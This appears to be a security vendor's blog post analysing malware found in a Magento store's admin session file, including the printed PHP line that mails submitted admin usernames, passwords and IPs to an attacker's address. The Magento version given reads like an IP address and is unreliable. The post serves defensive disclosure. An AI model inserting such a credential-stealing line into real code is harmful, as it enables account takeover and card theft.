Lately we’ve been dealing with an increase in attacks against ecommerce platforms. Attackers usually choose this type of solution (like Magento & others) because of the sensitive information on credit cards they can extract, as well as other potential monetary gains.
Different from other cases where they went straight to the checkout process, attackers injected a malware inside the core file “app/code/core/Mage/Admin/Model/Session.php” directly after the code used to authenticate an admin user.The malicious code is collecting the submitted information and sending it to a Gmail account via the mail function.
mail("malicious-email","Admin From ".$_SERVER['HTTP_HOST'],"Login : ".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."nUsername : ".$username."nPassword : ".$password."nIP Log : ".$_SERVER['REMOTE_ADDR']);
Once login credentials are obtained, a malicious user could not only access the credit card information from the database but modify the site and add malware to infect users visiting the website. The website where this malware was found ran on Magento 184.108.40.206 which is known to have a remote code execution vulnerability. We believe this to be the attack vector used to compromise this website and inject this malware along with other malicious files.
It appears that Magento sites are being targeted heavily. In most cases we see credit cards being stolen but it looks like login credentials are also being collected. We recommend keeping your Magento installations up to date at all times. If you are unable to upgrade your Magento, we recommend placing the site behind our Website Firewall (CloudProxy ) which will virtually patch the CMS.
Last but not least, we recently published two other techniques that attackers may use to steal back-end credentials. You can check those here: